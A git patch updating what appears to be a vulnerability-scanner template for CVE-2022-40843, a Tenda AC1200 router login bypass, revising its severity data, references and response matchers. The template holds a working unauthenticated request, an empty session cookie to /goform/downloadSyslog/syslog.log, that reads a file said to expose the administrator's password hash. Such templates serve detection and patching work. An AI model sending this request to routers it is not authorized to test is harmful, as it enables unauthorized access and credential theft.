From 935906680da66320d97ec003cf8897ea34c8b124 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:43:38 +0530 Subject: [PATCH] updated matcher & info --- cves/2022/CVE-2022-40843.yaml | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml index a4cf032c74..dcf2f460a7 100644 --- a/cves/2022/CVE-2022-40843.yaml +++ b/cves/2022/CVE-2022-40843.yaml @@ -8,29 +8,36 @@ info: The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. reference: - https://boschko.ca/tenda_ac1200_router + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 cve-id: CVE-2022-40843 - cwe-id: CWE-78 - tags: cve,cve2022,tenda,auth-bypass,router + cwe-id: CWE-287 + metadata: + max-request: 1 + tags: cve,cve2022,tenda,auth-bypass,router,iot requests: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Cookie: W15Ev2_user= - Connection: close matchers-condition: and matchers: + - type: regex + regex: + - '^0\d{3}$' + - type: word + part: body words: - - "0001" - - "0002" - condition: and + - "[system]" + - "[error]" + - "[wan1]" + condition: or - type: word part: header